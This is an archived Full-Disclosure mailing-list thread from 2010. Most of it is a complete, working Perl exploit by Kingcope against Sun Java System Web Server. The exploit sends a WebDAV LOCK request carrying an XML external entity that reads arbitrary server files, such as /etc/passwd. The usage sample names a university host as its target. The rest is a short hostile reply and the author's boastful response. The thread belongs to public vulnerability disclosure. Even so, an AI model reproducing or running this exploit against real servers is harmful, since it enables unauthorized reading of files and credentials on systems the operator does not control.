[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Sun D3VS SM0KiNG PoT AGAiN



www.isowarez.de - you have no idea what we're able to r0xx000Or

2010/4/3 Christian Sciberras <uuf6429@xxxxxxxxx>:
> "Sun D3VS SM0KiNG PoT AGAiN"
> "SuPP0RT iF YOU#RE kRAD KTHX"
>
> What the fuck is wrong with you guys?
> Ever gave the psychiatrist a visit?
>
>
>
>
>
>
> On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2@xxxxxxxxxxxxxx> wrote:
>>
>> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
>> KTHX
>>
>> #!/usr/bin/perl
>> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
>> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
>> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
>> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
>> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
>> # MAY/2010
>> # VERY THANKS TO LSD
>> #
>> #
>> # oO VERiFIED oN Oo
>> #
>> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
>> SERVER 2008 & SunOS 5.10]
>> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
>> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
>> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>>
>> use IO::Socket;
>> use MIME::Base64;
>>
>> print "//Sun Microsystems Sun Java System Web Server\n";
>> print "//Remote File Disclosure Exploit\n";
>> print "//by Kingcope\n";
>> print "May/2010\n";
>>
>> if ($#ARGV != 2) {
>>        print "usage: perl sunone.pl <target> <webdav directory> <file to
>> get>\n";
>>        print "sample: perl sunone.pl lib7.berkeley.edu /dav
>> /etc/passwd\n";
>>        exit;
>> }
>>
>> $target = $ARGV[0];
>>
>> $|=1;
>>
>> $remotefile = $ARGV[2];
>> $folder = $ARGV[1];
>>
>> $KRADXmL =
>> "<?xml version=\"1.0\"?>\n"
>> ."<!DOCTYPE REMOTE [\n"
>> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
>> ."]>\n"
>> ."<D:lockinfo xmlns:D='DAV:'>\n"
>> ."<D:lockscope><D:exclusive/></D:lockscope>\n"
>> ."<D:locktype><D:write/></D:locktype>\n"
>> ."<D:owner>\n"
>> ."<D:href>\n"
>> ."<REMOTE>\n"
>> ."<RemoteX>&RemoteX;</RemoteX>\n"
>> ."</REMOTE>\n"
>> ."</D:href>\n"
>> ."</D:owner>\n"
>> ."</D:lockinfo>\n";
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $target,
>>                              PeerPort => '80',
>>                              Proto    => 'tcp');
>>
>> print $sock "LOCK /$folder HTTP/1.1\r\n".
>>                        "Host: $target\r\n".
>>                        "Depth: 0\r\n".
>>                        "Connection: close\r\n".
>>                        "Content-Type: application/xml\r\nContent-Length:
>> ".length($KRADXmL)."\r\n\r\n".
>>                        $KRADXmL;
>>
>> $locktoken = "";
>> while(<$sock>) {
>>        if ($_ =~ /^Lock-token:\s(.*)?\r/) {
>>                $locktoken = $1;
>>                chomp $locktoken;
>>        }
>>        print;
>> }
>>
>> close($sock);
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $target,
>>                              PeerPort => '80',
>>                              Proto    => 'tcp');
>>
>> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>>                        "Host: $target\r\n".
>>                        "Connection: close\r\n".
>>                        "Lock-token: $locktoken\r\n\r\n";
>>
>> while(<$sock>) {
>>        print;
>> }
>> close($sock);
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/